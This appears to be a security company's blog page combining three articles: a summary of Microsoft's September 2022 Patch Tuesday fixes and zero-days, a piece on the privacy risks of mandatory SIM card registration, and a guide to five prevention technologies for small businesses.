Stay safe out there!

Update now! Microsoft patches two zero-days

The Microsoft September 2022 Patch Tuesday includes fixes for two publicly disclosed zero-day vulnerabilities, one of which is known to be actively exploited.

Five of the 60+ security vulnerabilities were rated as “Critical”, and 57 as important. Two vulnerabilities qualify as zero-days, with one of them being actively exploited.

Zero-days

The first zero-day, CVE-2022-37969, is a Windows Common Log File System Driver Elevation of Privilege (EoP) vulnerability. An attacker who successfully exploits this vulnerability could gain SYSTEM privileges, although the attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system. This flaw is already being exploited in the wild.

Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

The second zero-day, CVE-2022-23960, is an Arm cache speculation restriction vulnerability that is unlikely to be exploited. Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mis-predicted branches. Then, cache allocation can allow the attacker to obtain sensitive information. The vulnerability was disclosed in March by researchers at VUSec.

The critical vulnerabilities

CVE-2022-35805 and CVE-2022-34700 are both Microsoft Dynamics CRM (on-premises) Remote Code Execution (RCE) vulnerabilities. An authenticated user could run a specially crafted trusted solution package to execute arbitrary SQL commands. From there the attacker could escalate and execute commands as db_owner within their Dynamics 365 database.

CVE-2022-34718: a Windows TCP/IP RCE vulnerability with a CVSS score of 9.8 out of 10. An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPSec is enabled, which could enable a remote code execution exploitation on that machine. Only systems with the IPSec service running are vulnerable to this attack. Systems are not affected if IPv6 is disabled on the target machine.

CVE-2022-34721 and CVE-2022-34722 are both Windows Internet Key Exchange (IKE) Protocol Extensions RCE vulnerabilities with a CVSS score of 9.8 out of 10. An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation. The vulnerability only impacts IKEv1; IKEv2 is not impacted. However, all Windows servers are affected because they accept both v1 and v2 packets.

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are a few major ones:

Stay patched!

The privacy concerns of tying SIM cards to real identities

The registration of SIM cards tied to a verified identity is back in the news, off the back of large-scale phone fraud. In what some may call a knee-jerk response to a problem, there are calls to revive a legal bill and make it law. What’s happening, and what are the potential ramifications?

Hitting spam with the registration hammer

More than 1 billion suspicious messages and spam texts have been sent in the Philippines in 2022 so far. These messages run the usual range of phishing and fraudulent transaction attempts. This is enough to have Senators calling for “tougher measures” on cybercrime.

This would be in the form of a bill drafted earlier in the year, aiming to have social media users register legal identities and phone numbers. Turned down due to a lack of detail and guidelines which “may give rise to a situation of dangerous state intrusion and surveillance threatening many constitutionally protected rights”, it’s now back on the table. The problem is, there appears to be no fix for privacy invasion and the more general concerns outside of social media use.

The weaving web of SIM registration

Tying SIM cards to real world identity registration is an idea which has been around for a long time. In many places, there doesn’t appear to be much of an appetite for such a policy. In the UK, for example, you can buy any SIM of your choosing with cash and start using it in your phone, although that’s not to say mandatory registration of one form or another doesn’t exist.

China has a well-known daisy-chain of registrations for all manner of online and offline activities. Real-name registration is tied to online accounts, which, as noted by Comparitech, means there’s no way to make anonymous accounts when combined with SIM registration.

Elsewhere, several nations have put it forward as a legal suggestion only to go on and retract the idea. It’s the very definition of a “blowing hot and cold” topic.

The risks of SIM registration

There are many potentially harmful privacy issues where tying ID to SIM purchasing is concerned.

  1. Oppressive regimes are only too happy for people trying to evade censorship to become tangled up in registration schemes. The chilling effect on free speech is overt in these scenarios.

  2. People and families at risk from domestic abuse may struggle to register a SIM, especially in situations where money is tight or they’re on the run without identity documents. It’s also one more database for all their information to wind up on, with the possibility of a breach and leak down the line.

  3. You can almost guarantee any such data will be plugged into marketing and advertising, especially in places where there’s no provision to expressly forbid such a thing. This could easily tie back to point 2 in several ways which aren’t beneficial to the person under threat.

Kicking the can down the road?

At a time when tracking, data disclosure, and location issues are coming under increasing scrutiny, this feels very much like something not likely to get off the ground in places where it doesn’t already exist. We suspect that if you don’t have this in place currently, it’s not something you should be overly concerned about for the time being.

5 technologies that help prevent cyberattacks for SMBs 

Now more than ever, threat actors are trying to attack company networks. In fact, there were 50% more attack attempts per week on corporate networks globally in 2021 than in 2020.

Small-and-medium-sized businesses in particular need to be on the lookout, as cybercriminals are more likely to target them for their perceived (and sometimes actual) lack of cyberdefenses.

This article focuses on helping to prevent cyberattacks purely through technology, though of course businesses need a combination of technology, people, and strategy to truly become cyber resilient.

That being said, security experts advise against relying solely on a single technology or technique to protect business endpoints. Effective prevention requires a layered approach capable of addressing not only today’s threats, but preventing tomorrow’s as well. 

In this post, we break down five must-have technologies that help prevent cyberattacks for SMBs.

Your level of prevention is determined by how much risk you are willing to take on

There are two extremes to prevent cyberattacks: Overly permissive prevention and absolute prevention—and where you fall on that spectrum depends on the level of risk in your organization.


Let’s start at one extreme.

In the medical industry for example, doctors in large hospitals use a virtual machine. The machine they use operates in a virtual environment, and that virtual environment is destroyed and recreated when they log back in in another room. They can’t install anything or change anything. Data is kept separate. 

Moving towards the other end of the extreme, you might find startups or smaller companies with very lax prevention. Something like, “Here’s a laptop. We’ve provided you with the basic software, call us if you have a problem.”

What’s important to note here is that, because the risk level of every organization is different, there’s no “one-size-fits-all” approach to prevent cyberattacks. Your level of prevention will vary drastically depending on industry, company size, and so on.

Having said that, the average small-to-medium-sized business falls somewhere in the middle of these two extremes. At a medium level of risk, you want to find that perfect balance between too strict and too permissive. 

Remember the maxim: The cyberattacks you cannot prevent, you need to mitigate. For mitigation, we assume your business uses (or outsources) endpoint detection and response—but you still need the right technology to prevent cyberattacks in the first place, especially ransomware.

The question for any IT leader then is: What can I prevent, without slowing down my business?

5 technologies that help prevent cyber attacks for SMBs (ranked in order of importance)

(Note: these aren’t hard-and-fast rankings, just a good rule of thumb. They may look different for your individual business—for example, you might put 2FA first before anything else and that’s totally OK.)

1. Endpoint protection

Before anything else, endpoint protection should be the first thing you set out to pair with your EDR.

Through a combination of web protection, application hardening, and more, endpoint protection (EP) provides businesses with full attack chain protection against both known and unknown malware, ransomware, and zero-hour threats. Multi-stage attack protection provides the ability to stop an attacker at every step.

Read our “Endpoint Protection Buyers Guide” for the core requirements to consider when evaluating enterprise endpoint protection solutions; it also includes a solution questionnaire to help with your evaluation process.

Read more: What is endpoint protection?

2. Vulnerability assessment AND patch management (tied) 

Hold on a sec, you’re telling me vulnerability assessment and patch management are preventative? Don’t both of these mitigate being compromised, since the vulnerability is already technically present?

Well, sure—but the only surefire way to prevent a vulnerability from being exploited is to patch it. Therefore, finding vulnerabilities (and categorizing them by severity) and then systematically patching them before they can be exploited are two vital preventative measures.

And no, you don’t want to do either of these things manually if you can help it. A vulnerability assessment platform can automatically find and score vulnerabilities with the Common Vulnerability Scoring System (CVSS), while a patch management platform can help you patch those vulnerabilities automatically.

Read more: Vulnerability response for SMBs: The Malwarebytes approach

3. DNS filtering

The next technology you need to prevent cyberattacks is a DNS filter. But first, a little bit about what DNS (domain name system) is. 

Every time a customer types in your web address, their computer makes a request to a DNS server. The DNS server, in turn, tells the computer where to go. If all goes well, then voila, your customer is at your website. 

A DNS filter prevents you from accessing unsafe websites—including those posing a strong malware risk. But which web-based cyberthreats in particular does DNS filtering stop, you ask? There are three big ones:

  • Phishing: If you have a DNS filter, as soon as someone in your business clicks a link to a malicious website, they’re prevented from visiting it. 

  • DDoS attacks: Being able to continuously monitor DNS activity is a great way to catch the warning signs of a DNS DDoS attack—and with a DNS filter, you can do exactly that.

  • Machine-in-the-middle attacks: A good DNS filter uses DNS encryption, which secures the connection between your computer and the DNS resolver. That way, cybercriminals cannot sit between you and the resolver and feed you spoofed DNS entries.

Read more: 3 ways DNS filtering can save SMBs from cyberattacks

4. Cloud scanning

No matter what cloud storage service you use, you likely store a lot of data: A mid-sized company can easily have over 40TB of data stored in the form of millions of files. 

Needless to say, it can be difficult to monitor and control all the activity in and out of cloud storage repositories, making it easy for malware to hide in the noise as it makes its way to the cloud. That’s where cloud storage scanning comes in.

Most cloud storage apps already have malware-scanning capabilities. However, businesses use multiple different cloud storage repositories, and due to lack of integration options, they are unable to get a centralized view of all of their scan results, across multiple repositories, in a single pane of glass.

To better prevent cyberattacks, look for a cloud scanning service that uses multiple anti-malware engines, using a combination of signatures, heuristics and machine learning to increase detection rates. Also, look for one that provides a comprehensive view to monitor the health of all your enterprise data.

Read more: Cloud-based malware is on the rise. How can you secure your business?

5. 2FA

Two-factor authentication (2FA) is a cost-effective option for SMBs. 2FA adds an extra layer of protection by asking users to provide two forms of identification to prove their identity.

According to Robert Zamani, Regional Vice President, Americas Solutions Engineering at Malwarebytes, 2FA is relatively quick and easy to implement.

“2FA is simple,” says Zamani. “You roll a device quickly, you enroll a device—that’s something they have, which is usually a smartphone—something they know, which is a password—and then you enforce password minimum.”

Read more: Understanding the basics of two-factor authentication

Bonus: Cyber insurance 

OK, it’s not a technology, but hear me out.

Let’s say your business has just suffered a data breach and it’s time to dig deep in your pockets to pay all the resulting expenses. Without cyber insurance, you can expect to pay a dizzying amount of cash.

In 2022 alone, the average cost of a data breach for businesses under 1,000 employees was close to $3 million—and these costs are coming from activities that cyber insurers typically cover, such as detecting and responding to the breach.

So when it comes to avoiding huge out-of-pocket costs in the event that you’re hit with a cyberattack, cyber insurance is a must. The harsh truth is that if you don’t have cyber insurance and are hit with ransomware with no way to recover files, you will likely go out of business—especially if you’re a small-and-medium-sized business.

Read more: 4 ways businesses can save money on cyber insurance 

A “Matryoshka approach” to cyber prevention

Let’s recap. 

Relying solely on a single technology or technique to protect your business’s endpoints is a fool’s errand.

At the same time, we have to understand that each business has different needs when it comes to prevention: Your level of risk is the chief decider of what tech you ultimately employ to prevent cyberattacks. Depending on your industry and company size, you could justifiably use all of these technologies and more—or none of them.


However, most SMBs will find themselves in the middle of the risk-prevention spectrum. To that end, the following are strongly recommended: endpoint protection, vulnerability assessment and patch management, DNS filtering, cloud storage scanning, and 2FA (and cyber insurance!).

Of course, you can’t prevent 100% of threats. Therefore, you need an EDR solution to detect and respond to what does get through. That is to say, you should pair any preventative technology with an EDR solution, and a good EDR can seamlessly integrate with all of the preventative technologies listed here.
